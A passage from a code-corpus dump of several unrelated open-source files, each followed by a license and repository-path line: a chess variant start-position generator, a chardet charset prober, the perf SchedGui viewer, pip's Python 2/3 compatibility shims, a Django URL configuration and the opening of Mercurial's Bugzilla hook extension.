whitelightbishops += 1
blackdarkbishops = 0
blacklightbishops = 0
blackbishoprandomindexstack = []
for index, piece in enumerate(black):
if piece == 'b':
if index % 2 == 1: # odd numbered squares on the H rank are dark
blackdarkbishops += 1
else:
blacklightbishops += 1
blackbishoprandomindexstack.append(index)
random.shuffle(blackbishoprandomindexstack)
class RandomEnumeratePieces:
def __init__ (self, pieces):
self.pieces = pieces[:]
self.randomindexstack = range(8)
random.shuffle(self.randomindexstack)
def __iter__ (self):
return self
def next(self):
if not self.randomindexstack:
raise StopIteration
else:
randomindex = self.randomindexstack.pop()
return randomindex, self.pieces[randomindex]
while (whitedarkbishops != blackdarkbishops) or \
(whitelightbishops != blacklightbishops):
bishopindex = blackbishoprandomindexstack.pop()
for index, piece in RandomEnumeratePieces(black):
if piece != 'b':
if ((blackdarkbishops > whitedarkbishops) and \
(bishopindex % 2 == 1) and (index % 2 == 0)):
black[bishopindex] = piece
black[index] = 'b'
blacklightbishops += 1
blackdarkbishops = blackdarkbishops > 0 and (blackdarkbishops-1) or 0
break
elif ((blacklightbishops > whitelightbishops) and \
(bishopindex % 2 == 0) and (index % 2 == 1)):
black[bishopindex] = piece
black[index] = 'b'
blackdarkbishops += 1
blacklightbishops = blacklightbishops > 0 and (blacklightbishops-1) or 0
break
tmp = ''.join(black) + '/pppppppp/8/8/8/8/PPPPPPPP/' + \
''.join(white).upper() + ' w - - 0 1'
return tmp
class AsymmetricRandomChess:
__desc__ = \
_("FICS wild/4: http://www.freechess.org/Help/HelpFiles/wild.html\n" +
"* Randomly chosen pieces (two queens or three rooks possible)\n" +
"* Exactly one king of each color\n" +
"* Pieces placed randomly behind the pawns, SUBJECT TO THE CONSTRAINT THAT THE BISHOPS ARE BALANCED\n" +
"* No castling\n" +
"* Black's arrangement DOES NOT mirrors white's")
name = _("Asymmetric Random")
cecp_name = "unknown"
board = AsymmetricRandomBoard
need_initial_board = True
standard_rules = True
variant_group = VARIANTS_SHUFFLE
if __name__ == '__main__':
Board = AsymmetricRandomBoard(True)
for i in range(10):
print(Board.asymmetricrandom_start())
| gpl-3.0 |
DennisDenuto/puppet-commonscripts | files/aws_cli/AWS-ElasticBeanstalk-CLI-2.6.3/eb/macosx/python3/lib/aws/requests/packages/charade/mbcharsetprober.py | 2924 | 3268 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
| mit |
agat63/E4GT_FH13_kernel | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
ljnutal6/media-recommend | app/virtualenvs/recommedia/lib/python2.7/site-packages/pip/backwardcompat/__init__.py | 80 | 3119 | """Stuff that differs in different Python versions"""
import os
import imp
import sys
import site
__all__ = ['WindowsError']
uses_pycache = hasattr(imp, 'cache_from_source')
class NeverUsedException(Exception):
"""this exception should never be raised"""
try:
WindowsError = WindowsError
except NameError:
WindowsError = NeverUsedException
try:
#new in Python 3.3
PermissionError = PermissionError
except NameError:
PermissionError = NeverUsedException
console_encoding = sys.__stdout__.encoding
if sys.version_info >= (3,):
from io import StringIO, BytesIO
from functools import reduce
from urllib.error import URLError, HTTPError
from queue import Queue, Empty
from urllib.request import url2pathname
from urllib.request import urlretrieve
from email import message as emailmessage
import urllib.parse as urllib
import urllib.request as urllib2
import configparser as ConfigParser
import xmlrpc.client as xmlrpclib
import urllib.parse as urlparse
import http.client as httplib
def cmp(a, b):
return (a > b) - (a < b)
def b(s):
return s.encode('utf-8')
def u(s):
return s.decode('utf-8')
def console_to_str(s):
try:
return s.decode(console_encoding)
except UnicodeDecodeError:
return s.decode('utf_8')
def fwrite(f, s):
f.buffer.write(b(s))
def get_http_message_param(http_message, param, default_value):
return http_message.get_param(param, default_value)
bytes = bytes
string_types = (str,)
raw_input = input
else:
from cStringIO import StringIO
from urllib2 import URLError, HTTPError
from Queue import Queue, Empty
from urllib import url2pathname, urlretrieve
from email import Message as emailmessage
import urllib
import urllib2
import urlparse
import ConfigParser
import xmlrpclib
import httplib
def b(s):
return s
def u(s):
return s
def console_to_str(s):
return s
def fwrite(f, s):
f.write(s)
def get_http_message_param(http_message, param, default_value):
result = http_message.getparam(param)
return result or default_value
bytes = str
string_types = (basestring,)
reduce = reduce
cmp = cmp
raw_input = raw_input
BytesIO = StringIO
from distutils.sysconfig import get_python_lib, get_python_version
#site.USER_SITE was created in py2.6
user_site = getattr(site, 'USER_SITE', None)
def product(*args, **kwds):
# product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy
# product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x + [y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
## only >=py32 has ssl.match_hostname and ssl.CertificateError
try:
from ssl import match_hostname, CertificateError
except ImportError:
from ssl_match_hostname import match_hostname, CertificateError
| gpl-2.0 |
tongxindao/Flask-micblog | MoocOnline/web/djangomooc/djangomooc/urls.py | 1 | 2567 | # _*_ coding: utf-8 _*_
__author__ = 'tongxindao'
"""djangomooc URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.views.static import serve
import xadmin
from users.views import LoginView, RegisterView, \
ActiveUserView, ForgetPwdView, ResetView, \
ModifyPwdView, LogOutView, IndexView
from djangomooc.settings import MEDIA_ROOT\
, STATIC_ROOT
urlpatterns = [
url(r'^xadmin/', xadmin.site.urls),
url(r'^$', IndexView.as_view(), name="index"),
url(r'^register/$', RegisterView.as_view(), name="register"),
url(r'^login/$', LoginView.as_view(), name="login"),
url(r'^logout/$', LogOutView.as_view(), name="logout"),
url(r'^captcha/', include('captcha.urls')),
url(r'^active/(?P<active_code>.*)/$', ActiveUserView.as_view(), name="user_active"),
# template 中 url 应填写 name 值,否则会报 NoReverseMatch
url(r'^forget/$', ForgetPwdView.as_view(), name="forget_pwd"),
url(r'^reset/(?P<reset_code>.*)/$', ResetView.as_view(), name="reset_pwd"),
url(r'^modify_pwd/$', ModifyPwdView.as_view(), name="modify_pwd"),
# 课程机构 url 配置
url(r'^org/', include('organization.urls', namespace="org")),
# 课程相关 url 配置
url(r'^course/', include('courses.urls', namespace="course")),
# 用户相关 url 配置
url(r'^users/', include('users.urls', namespace="users")),
# 配置上传文件的访问处理函数
url(r'^media/(?P<path>.*)$', serve, {"document_root": MEDIA_ROOT}),
# 当 setting.py 中 DEBUG 为 True 时以下设置将托管静态资源 url
url(r'^static/(?P<path>.*)$', serve, {"document_root": STATIC_ROOT}),
# 富文本相关 url
url(r'^ueditor/',include('DjangoUeditor.urls' )),
]
# 全局404页面配置
handler404 = 'users.views.page_not_found'
handler500 = 'users.views.page_error'
handler403 = 'users.views.page_no_permission'
| apache-2.0 |
ibinti/intellij-community | plugins/hg4idea/testData/bin/hgext/bugzilla.py | 93 | 34937 | # bugzilla.py - bugzilla integration for mercurial
#
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
# Copyright 2011-2 Jim Hague <jim.hague@acm.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''hooks for integrating with the Bugzilla bug tracker
This hook extension adds comments on bugs in Bugzilla when changesets
that refer to bugs by Bugzilla ID are seen. The comment is formatted using
the Mercurial template mechanism.
The bug references can optionally include an update for Bugzilla of the
hours spent working on the bug. Bugs can also be marked fixed.
Three basic modes of access to Bugzilla are provided:
1. Access via the Bugzilla XMLRPC interface. Requires Bugzilla 3.4 or later.
2. Check data via the Bugzilla XMLRPC interface and submit bug change
via email to Bugzilla email interface. Requires Bugzilla 3.4 or later.
3. Writing directly to the Bugzilla database. Only Bugzilla installations
using MySQL are supported. Requires Python MySQLdb.
Writing directly to the database is susceptible to schema changes, and
relies on a Bugzilla contrib script to send out bug change
notification emails. This script runs as the user running Mercurial,
must be run on the host with the Bugzilla install, and requires
permission to read Bugzilla configuration details and the necessary
MySQL user and password to have full access rights to the Bugzilla
database. For these reasons this access mode is now considered
deprecated, and will not be updated for new Bugzilla versions going
forward. Only adding comments is supported in this access mode.
Access via XMLRPC needs a Bugzilla username and password to be specified
in the configuration. Comments are added under that username. Since the
configuration must be readable by all Mercurial users, it is recommended
that the rights of that user are restricted in Bugzilla to the minimum
necessary to add comments. Marking bugs fixed requires Bugzilla 4.0 and later.
Access via XMLRPC/email uses XMLRPC to query Bugzilla, but sends
email to the Bugzilla email interface to submit comments to bugs.
The From: address in the email is set to the email address of the Mercurial
user, so the comment appears to come from the Mercurial user. In the event
that the Mercurial user email is not recognized by Bugzilla as a Bugzilla
user, the email associated with the Bugzilla username used to log into
Bugzilla is used instead as the source of the comment. Marking bugs fixed
works on all supported Bugzilla versions.
Configuration items common to all access modes:
bugzilla.version
The access type to use. Values recognized are:
:``xmlrpc``: Bugzilla XMLRPC interface.
:``xmlrpc+email``: Bugzilla XMLRPC and email interfaces.
:``3.0``: MySQL access, Bugzilla 3.0 and later.
:``2.18``: MySQL access, Bugzilla 2.18 and up to but not
including 3.0.
:``2.16``: MySQL access, Bugzilla 2.16 and up to but not
including 2.18.
bugzilla.regexp
Regular expression to match bug IDs for update in changeset commit message.
It must contain one "()" named group ``<ids>`` containing the bug
IDs separated by non-digit characters. It may also contain
a named group ``<hours>`` with a floating-point number giving the
hours worked on the bug. If no named groups are present, the first
"()" group is assumed to contain the bug IDs, and work time is not
updated. The default expression matches ``Bug 1234``, ``Bug no. 1234``,
``Bug number 1234``, ``Bugs 1234,5678``, ``Bug 1234 and 5678`` and
variations thereof, followed by an hours number prefixed by ``h`` or
``hours``, e.g. ``hours 1.5``. Matching is case insensitive.
bugzilla.fixregexp
Regular expression to match bug IDs for marking fixed in changeset
commit message. This must contain a "()" named group ``<ids>` containing
the bug IDs separated by non-digit characters. It may also contain
a named group ``<hours>`` with a floating-point number giving the
hours worked on the bug. If no named groups are present, the first
"()" group is assumed to contain the bug IDs, and work time is not
updated. The default expression matches ``Fixes 1234``, ``Fixes bug 1234``,
``Fixes bugs 1234,5678``, ``Fixes 1234 and 5678`` and
variations thereof, followed by an hours number prefixed by ``h`` or
``hours``, e.g. ``hours 1.5``. Matching is case insensitive.
bugzilla.fixstatus
The status to set a bug to when marking fixed. Default ``RESOLVED``.
bugzilla.fixresolution
The resolution to set a bug to when marking fixed. Default ``FIXED``.
bugzilla.style
The style file to use when formatting comments.
bugzilla.template
Template to use when formatting comments. Overrides style if
specified. In addition to the usual Mercurial keywords, the
extension specifies:
:``{bug}``: The Bugzilla bug ID.
:``{root}``: The full pathname of the Mercurial repository.
:``{webroot}``: Stripped pathname of the Mercurial repository.
:``{hgweb}``: Base URL for browsing Mercurial repositories.
Default ``changeset {node|short} in repo {root} refers to bug
{bug}.\\ndetails:\\n\\t{desc|tabindent}``
bugzilla.strip
The number of path separator characters to strip from the front of
the Mercurial repository path (``{root}`` in templates) to produce
``{webroot}``. For example, a repository with ``{root}``
``/var/local/my-project`` with a strip of 2 gives a value for
``{webroot}`` of ``my-project``. Default 0.
web.baseurl
Base URL for browsing Mercurial repositories. Referenced from
templates as ``{hgweb}``.
Configuration items common to XMLRPC+email and MySQL access modes:
bugzilla.usermap
Path of file containing Mercurial committer email to Bugzilla user email
mappings. If specified, the file should contain one mapping per
line::
committer = Bugzilla user
See also the ``[usermap]`` section.
The ``[usermap]`` section is used to specify mappings of Mercurial
committer email to Bugzilla user email. See also ``bugzilla.usermap``.
Contains entries of the form ``committer = Bugzilla user``.
XMLRPC access mode configuration:
bugzilla.bzurl
The base URL for the Bugzilla installation.
Default ``http://localhost/bugzilla``.
bugzilla.user
The username to use to log into Bugzilla via XMLRPC. Default
``bugs``.
bugzilla.password
The password for Bugzilla login.
XMLRPC+email access mode uses the XMLRPC access mode configuration items,
and also:
bugzilla.bzemail
The Bugzilla email address.
In addition, the Mercurial email settings must be configured. See the
documentation in hgrc(5), sections ``[email]`` and ``[smtp]``.
MySQL access mode configuration:
bugzilla.host
Hostname of the MySQL server holding the Bugzilla database.
Default ``localhost``.
bugzilla.db
Name of the Bugzilla database in MySQL. Default ``bugs``.
bugzilla.user
Username to use to access MySQL server. Default ``bugs``.
bugzilla.password
Password to use to access MySQL server.
bugzilla.timeout
Database connection timeout (seconds). Default 5.
bugzilla.bzuser
Fallback Bugzilla user name to record comments with, if changeset
committer cannot be found as a Bugzilla user.
bugzilla.bzdir
Bugzilla install directory. Used by default notify. Default
``/var/www/html/bugzilla``.
bugzilla.notify
The command to run to get Bugzilla to send bug change notification
emails. Substitutes from a map with 3 keys, ``bzdir``, ``id`` (bug
id) and ``user`` (committer bugzilla email). Default depends on
version; from 2.18 it is "cd %(bzdir)s && perl -T
contrib/sendbugmail.pl %(id)s %(user)s".
Activating the extension::
[extensions]
bugzilla =
[hooks]
# run bugzilla hook on every change pulled or pushed in here
incoming.bugzilla = python:hgext.bugzilla.hook
Example configurations:
XMLRPC example configuration. This uses the Bugzilla at
``http://my-project.org/bugzilla``, logging in as user
``bugmail@my-project.org`` with password ``plugh``. It is used with a
collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. ::
[bugzilla]
bzurl=http://my-project.org/bugzilla
user=bugmail@my-project.org
password=plugh
version=xmlrpc
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
XMLRPC+email example configuration. This uses the Bugzilla at
``http://my-project.org/bugzilla``, logging in as user
``bugmail@my-project.org`` with password ``plugh``. It is used with a
collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. Bug comments
are sent to the Bugzilla email address
``bugzilla@my-project.org``. ::
[bugzilla]
bzurl=http://my-project.org/bugzilla
user=bugmail@my-project.org
password=plugh
version=xmlrpc
bzemail=bugzilla@my-project.org
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
[usermap]
user@emaildomain.com=user.name@bugzilladomain.com
MySQL example configuration. This has a local Bugzilla 3.2 installation
in ``/opt/bugzilla-3.2``. The MySQL database is on ``localhost``,
the Bugzilla database name is ``bugs`` and MySQL is
accessed with MySQL username ``bugs`` password ``XYZZY``. It is used
with a collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. ::
[bugzilla]
host=localhost
password=XYZZY
version=3.0
bzuser=unknown@domain.com
bzdir=/opt/bugzilla-3.2
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
[usermap]
user@emaildomain.com=user.name@bugzilladomain.com
All the above add a comment to the Bugzilla bug record of the form::
Changeset 3b16791d6642 in repository-name.
http://my-project.org/hg/repository-name/rev/3b16791d6642
Changeset commit comment. Bug 1234.
'''
from mercurial.i18n import _
from mercurial.node import short
from mercurial import cmdutil, mail, templater, util
import re, time, urlparse, xmlrpclib
testedwith = 'internal'
class bzaccess(object):
'''Base class for access to Bugzilla.'''
def __init__(self, ui):
self.ui = ui
usermap = self.ui.config('bugzilla', 'usermap')
if usermap:
self.ui.readconfig(usermap, sections=['usermap'])
def map_committer(self, user):
'''map name of committer to Bugzilla user name.'''
for committer, bzuser in self.ui.configitems('usermap'):
if committer.lower() == user.lower():
return bzuser
return user
# Methods to be implemented by access classes.
#
# 'bugs' is a dict keyed on bug id, where values are a dict holding
# updates to bug state. Recognized dict keys are:
#
# 'hours': Value, float containing work hours to be updated.
# 'fix': If key present, bug is to be marked fixed. Value ignored.
def filter_real_bug_ids(self, bugs):
'''remove bug IDs that do not exist in Bugzilla from bugs.'''
pass
def filter_cset_known_bug_ids(self, node, bugs):
'''remove bug IDs where node occurs in comment text from bugs.'''
pass
def updatebug(self, bugid, newstate, text, committer):
'''update the specified bug. Add comment text and set new states.
If possible add the comment as being from the committer of
the changeset. Otherwise use the default Bugzilla user.
'''
pass
def notify(self, bugs, committer):
'''Force sending of Bugzilla notification emails.
Only required if the access method does not trigger notification
emails automatically.
'''
pass
# Bugzilla via direct access to MySQL database.
class bzmysql(bzaccess):
'''Support for direct MySQL access to Bugzilla.
The earliest Bugzilla version this is tested with is version 2.16.
If your Bugzilla is version 3.4 or above, you are strongly
recommended to use the XMLRPC access method instead.
'''
@staticmethod
def sql_buglist(ids):
'''return SQL-friendly list of bug ids'''
return '(' + ','.join(map(str, ids)) + ')'
_MySQLdb = None
def __init__(self, ui):
try:
import MySQLdb as mysql
bzmysql._MySQLdb = mysql
except ImportError, err:
raise util.Abort(_('python mysql support not available: %s') % err)
bzaccess.__init__(self, ui)
host = self.ui.config('bugzilla', 'host', 'localhost')
user = self.ui.config('bugzilla', 'user', 'bugs')
passwd = self.ui.config('bugzilla', 'password')
db = self.ui.config('bugzilla', 'db', 'bugs')
timeout = int(self.ui.config('bugzilla', 'timeout', 5))
self.ui.note(_('connecting to %s:%s as %s, password %s\n') %
(host, db, user, '*' * len(passwd)))
self.conn = bzmysql._MySQLdb.connect(host=host,
user=user, passwd=passwd,
db=db,
connect_timeout=timeout)
self.cursor = self.conn.cursor()
self.longdesc_id = self.get_longdesc_id()
self.user_ids = {}
self.default_notify = "cd %(bzdir)s && ./processmail %(id)s %(user)s"
def run(self, *args, **kwargs):
'''run a query.'''
self.ui.note(_('query: %s %s\n') % (args, kwargs))
try:
self.cursor.execute(*args, **kwargs)
except bzmysql._MySQLdb.MySQLError:
self.ui.note(_('failed query: %s %s\n') % (args, kwargs))
raise
def get_longdesc_id(self):
'''get identity of longdesc field'''
self.run('select fieldid from fielddefs where name = "longdesc"')
ids = self.cursor.fetchall()
if len(ids) != 1:
raise util.Abort(_('unknown database schema'))
return ids[0][0]
def filter_real_bug_ids(self, bugs):
'''filter not-existing bugs from set.'''
self.run('select bug_id from bugs where bug_id in %s' %
bzmysql.sql_buglist(bugs.keys()))
existing = [id for (id,) in self.cursor.fetchall()]
for id in bugs.keys():
if id not in existing:
self.ui.status(_('bug %d does not exist\n') % id)
del bugs[id]
def filter_cset_known_bug_ids(self, node, bugs):
'''filter bug ids that already refer to this changeset from set.'''
self.run('''select bug_id from longdescs where
bug_id in %s and thetext like "%%%s%%"''' %
(bzmysql.sql_buglist(bugs.keys()), short(node)))
for (id,) in self.cursor.fetchall():
self.ui.status(_('bug %d already knows about changeset %s\n') %
(id, short(node)))
del bugs[id]
def notify(self, bugs, committer):
'''tell bugzilla to send mail.'''
self.ui.status(_('telling bugzilla to send mail:\n'))
(user, userid) = self.get_bugzilla_user(committer)
for id in bugs.keys():
self.ui.status(_(' bug %s\n') % id)
cmdfmt = self.ui.config('bugzilla', 'notify', self.default_notify)
bzdir = self.ui.config('bugzilla', 'bzdir',
'/var/www/html/bugzilla')
try:
# Backwards-compatible with old notify string, which
# took one string. This will throw with a new format
# string.
cmd = cmdfmt % id
except TypeError:
cmd = cmdfmt % {'bzdir': bzdir, 'id': id, 'user': user}
self.ui.note(_('running notify command %s\n') % cmd)
fp = util.popen('(%s) 2>&1' % cmd)
out = fp.read()
ret = fp.close()
if ret:
self.ui.warn(out)
raise util.Abort(_('bugzilla notify command %s') %
util.explainexit(ret)[0])
self.ui.status(_('done\n'))
def get_user_id(self, user):
'''look up numeric bugzilla user id.'''
try:
return self.user_ids[user]
except KeyError:
try:
userid = int(user)
except ValueError:
self.ui.note(_('looking up user %s\n') % user)
self.run('''select userid from profiles
where login_name like %s''', user)
all = self.cursor.fetchall()
if len(all) != 1:
raise KeyError(user)
userid = int(all[0][0])
self.user_ids[user] = userid
return userid
def get_bugzilla_user(self, committer):
'''See if committer is a registered bugzilla user. Return
bugzilla username and userid if so. If not, return default
bugzilla username and userid.'''
user = self.map_committer(committer)
try:
userid = self.get_user_id(user)
except KeyError:
try:
defaultuser = self.ui.config('bugzilla', 'bzuser')
if not defaultuser:
raise util.Abort(_('cannot find bugzilla user id for %s') %
user)
userid = self.get_user_id(defaultuser)
user = defaultuser
except KeyError:
raise util.Abort(_('cannot find bugzilla user id for %s or %s')
% (user, defaultuser))
return (user, userid)
def updatebug(self, bugid, newstate, text, committer):
'''update bug state with comment text.
Try adding comment as committer of changeset, otherwise as
default bugzilla user.'''
if len(newstate) > 0:
self.ui.warn(_("Bugzilla/MySQL cannot update bug state\n"))
(user, userid) = self.get_bugzilla_user(committer)
now = time.strftime('%Y-%m-%d %H:%M:%S')
self.run('''insert into longdescs
(bug_id, who, bug_when, thetext)
values (%s, %s, %s, %s)''',
(bugid, userid, now, text))
self.run('''insert into bugs_activity (bug_id, who, bug_when, fieldid)
values (%s, %s, %s, %s)''',
(bugid, userid, now, self.longdesc_id))
self.conn.commit()
class bzmysql_2_18(bzmysql):
'''support for bugzilla 2.18 series.'''
def __init__(self, ui):
bzmysql.__init__(self, ui)
self.default_notify = \
"cd %(bzdir)s && perl -T contrib/sendbugmail.pl %(id)s %(user)s"
class bzmysql_3_0(bzmysql_2_18):
'''support for bugzilla 3.0 series.'''
def __init__(self, ui):
bzmysql_2_18.__init__(self, ui)
def get_longdesc_id(self):
'''get identity of longdesc field'''
self.run('select id from fielddefs where name = "longdesc"')
ids = self.cursor.fetchall()
if len(ids) != 1:
raise util.Abort(_('unknown database schema'))
return ids[0][0]
# Bugzilla via XMLRPC interface.
class cookietransportrequest(object):
"""A Transport request method that retains cookies over its lifetime.
The regular xmlrpclib transports ignore cookies. Which causes
a bit of a problem when you need a cookie-based login, as with
the Bugzilla XMLRPC interface.
So this is a helper for defining a Transport which looks for
cookies being set in responses and saves them to add to all future
requests.
"""
# Inspiration drawn from
# http://blog.godson.in/2010/09/how-to-make-python-xmlrpclib-client.html
# http://www.itkovian.net/base/transport-class-for-pythons-xml-rpc-lib/
